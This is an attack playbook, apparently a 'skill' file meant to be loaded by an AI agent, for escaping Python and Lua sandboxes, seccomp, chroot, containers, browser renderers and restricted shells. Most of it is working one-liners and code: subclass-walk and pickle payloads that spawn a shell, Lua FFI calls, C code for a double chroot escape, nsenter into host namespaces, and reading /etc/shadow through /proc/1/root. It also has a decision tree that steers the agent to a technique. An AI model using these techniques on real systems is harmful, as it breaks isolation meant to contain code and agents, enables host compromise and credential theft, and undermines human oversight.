SKILL: Sandbox Escape — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert sandbox escape techniques across Python, Lua, seccomp, chroot, Docker/container, and browser sandbox contexts. Covers CTF pyjail patterns, seccomp architecture confusion, chroot fd leaks, namespace escape, and Mojo IPC abuse. Distilled from ctf-wiki sandbox sections and real-world container escapes. Base models often miss the distinction between sandbox types and apply wrong escape techniques.
0. RELATED ROUTING
Advanced References
- PYTHON_SANDBOX_ESCAPE.md — Full pyjail methodology:
__builtins__ recovery, keyword bypass, AST bypass, pickle escape
- SECCOMP_BYPASS.md — Architecture confusion, io_uring bypass, ptrace bypass, allowed syscall chaining
1. SANDBOX TYPE IDENTIFICATION
| Sandbox Type | Indicators | Typical Context |
|---|
| Python sandbox (pyjail) | Limited builtins, filtered keywords, exec/eval available | CTF, online judges, Jupyter |
| Lua sandbox | No os, io modules; restricted metatables | Game scripting, config |
| seccomp | syscall filtering, prctl(PR_SET_SECCOMP) | CTF pwn, container hardening |
| chroot | Changed root filesystem, limited /proc access | Legacy isolation |
| Docker/container | Namespaces, cgroups, reduced capabilities | Cloud, microservices |
| Browser (renderer) | OS-level sandbox (seccomp-bpf + namespaces on Linux) | Chrome, Firefox |
| Namespace isolation | PID/mount/network/user namespace | Container runtimes |
2. PYTHON SANDBOX ESCAPE (OVERVIEW)
See PYTHON_SANDBOX_ESCAPE.md for full methodology.
Quick Reference
| Technique | One-Liner |
|---|
| Subclass walk | ().__class__.__bases__[0].__subclasses__() → find os._wrap_close → __init__.__globals__['system'] |
| Import recovery | __builtins__.__import__('os').system('sh') |
| getattr bypass | getattr(getattr(__builtins__, '__imp'+'ort__'), '__call__')('os') |
| chr construction | eval(chr(95)+chr(95)+'import'+chr(95)+chr(95)) |
| Pickle escape | pickle.loads(b"cos\nsystem\n(S'sh'\ntR.") |
| Code object | Construct types.CodeType(...) then exec() with custom bytecode |
3. LUA SANDBOX ESCAPE
Restricted Environment Bypass
-- If debug library available:
debug.getinfo(1) -- information leakage
debug.getregistry() -- access global registry
debug.getupvalue(func, 1) -- read closed-over variables
debug.setupvalue(func, 1, new_val) -- overwrite upvalues
-- Recover os module via debug:
local getupvalue = debug.getupvalue
-- Walk upvalues of known functions to find references to os/io
-- If loadstring available:
loadstring("os.execute('sh')")()
-- If string.dump available:
-- Dump function bytecode, patch it, load modified function
-- Metatables escape:
-- If rawset/rawget blocked but __index/__newindex exists:
-- Forge metatable chain to access restricted globals
Lua FFI Escape (LuaJIT)
-- LuaJIT FFI provides C function access
local ffi = require("ffi")
ffi.cdef[[ int system(const char *command); ]]
ffi.C.system("sh")
-- If require is blocked but ffi is preloaded:
-- Find ffi via package.loaded or debug.getregistry
4. CHROOT ESCAPE
| Technique | Condition | Method |
|---|
| Open fd to real root | File descriptor leaked from outside chroot | fchdir(leaked_fd) then chroot(".") |
| Double chroot | Process is root inside chroot | mkdir("x"); chroot("x"); chdir("../../../..") |
| TIOCSTI ioctl | Terminal access (fd 0 is a TTY) | Inject keystrokes to parent shell via ioctl(0, TIOCSTI, &c) |
| /proc access | /proc mounted inside chroot | /proc/1/root/ → access real root filesystem |
| ptrace | CAP_SYS_PTRACE | Attach to process outside chroot |
| Mount namespace | Privileged | Mount real root into chroot |
Double Chroot Escape
// Must be root inside chroot
mkdir("/tmp/escape", 0755);
chroot("/tmp/escape"); // new chroot inside old chroot
// Old CWD is now outside the new chroot
// Navigate up to real root:
for (int i = 0; i < 100; i++) chdir("..");
chroot("."); // now at real root
execl("/bin/sh", "sh", NULL);
5. BROWSER SANDBOX ESCAPE (OVERVIEW)
Chrome Sandbox Architecture (Linux)
Renderer Process:
├── seccomp-bpf (syscall filter)
├── PID namespace (isolated PIDs)
├── Network namespace (no direct network)
├── Mount namespace (minimal filesystem)
└── Reduced capabilities (no CAP_SYS_ADMIN etc.)
Escape Vectors
| Vector | Description |
|---|
| Mojo IPC bug | UAF or type confusion in Mojo interface handler in browser process |
| Shared memory corruption | Corrupt shared memory segments between renderer and browser |
| GPU process bug | Exploit GPU process (less sandboxed) as stepping stone |
| Kernel exploit | Escape directly via kernel vulnerability (bypasses all sandboxing) |
| Signal handling | Race condition in signal delivery across sandbox boundary |
Mojo Interface Attack Pattern
1. Renderer RCE achieved (via V8/Blink bug)
2. Enumerate available Mojo interfaces from renderer
3. Find vulnerable interface (UAF on message handling, integer overflow in parameter validation)
4. Craft malicious Mojo message → trigger bug in browser process
5. Browser process is unsandboxed → full system access
6. NAMESPACE ESCAPE
User Namespace Escalation
# If allowed to create user namespaces (unprivileged):
unshare -Urm # Create new user + mount namespace as root inside
# Inside namespace: can mount, modify, etc.
# Escape requires kernel bug or misconfiguration
PID Namespace Escape
# If /proc is from host (misconfigured container):
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# Enters init process namespaces → host access
Mount Namespace Tricks
# If can see host filesystem via /proc/1/root:
ls -la /proc/1/root/ # host root filesystem
cat /proc/1/root/etc/shadow # read host files
# If can mount:
mount -t proc proc /proc
# Access host /proc entries
7. RBASH / RESTRICTED SHELL ESCAPE
| Technique | Method |
|---|
| vi/vim | :!/bin/bash or :set shell=/bin/bash then :shell |
| less/more | !/bin/bash |
| awk | awk 'BEGIN {system("/bin/bash")}' |
| find | find / -exec /bin/bash \; |
| python/perl/ruby | python -c 'import pty;pty.spawn("/bin/bash")' |
| ssh | ssh user@host -t /bin/bash |
| Environment | export PATH=/usr/bin:/bin; /bin/bash |
| cp | Copy /bin/bash to allowed directory |
| git | git help config → then !/bin/bash in pager |
| Encoding | `echo /bin/bash |
8. DECISION TREE
What type of sandbox?
├── Python sandbox (pyjail)?
│ └── See PYTHON_SANDBOX_ESCAPE.md
│ ├── __builtins__ available? → direct import
│ ├── Subclass walk: ().__class__.__bases__[0].__subclasses__()
│ ├── Keywords filtered? → chr()/getattr() construction
│ └── eval/exec available? → code object manipulation
│
├── Lua sandbox?
│ ├── debug library available? → getregistry/getupvalue
│ ├── FFI available (LuaJIT)? → ffi.C.system()
│ ├── loadstring available? → load arbitrary code
│ └── All restricted? → metatable chain exploitation
│
├── seccomp filter?
│ └── See SECCOMP_BYPASS.md
│ ├── Architecture confusion (32-bit syscalls from 64-bit)
│ ├── Allowed syscalls → ORW chain
│ ├── io_uring allowed? → bypass via io_uring
│ └── ptrace allowed? → debug child process
│
├── chroot jail?
│ ├── Root inside chroot? → double chroot escape
│ ├── Leaked fd? → fchdir to real root
│ ├── /proc mounted? → /proc/1/root access
│ └── Terminal access? → TIOCSTI injection
│
├── Container / Docker?
│ ├── Privileged container? → mount host, load kernel module
│ ├── Mounted docker.sock? → docker API → escape
│ ├── See ../container-escape-techniques/SKILL.md
│ └── Kernel exploit → full escape
│
├── Browser sandbox?
│ ├── Have renderer RCE? → target Mojo IPC for browser escape
│ ├── GPU process accessible? → less-sandboxed stepping stone
│ └── Kernel exploit → bypass sandbox entirely
│
└── Restricted shell (rbash)?
└── Find any interactive program (vi, less, python, awk, git)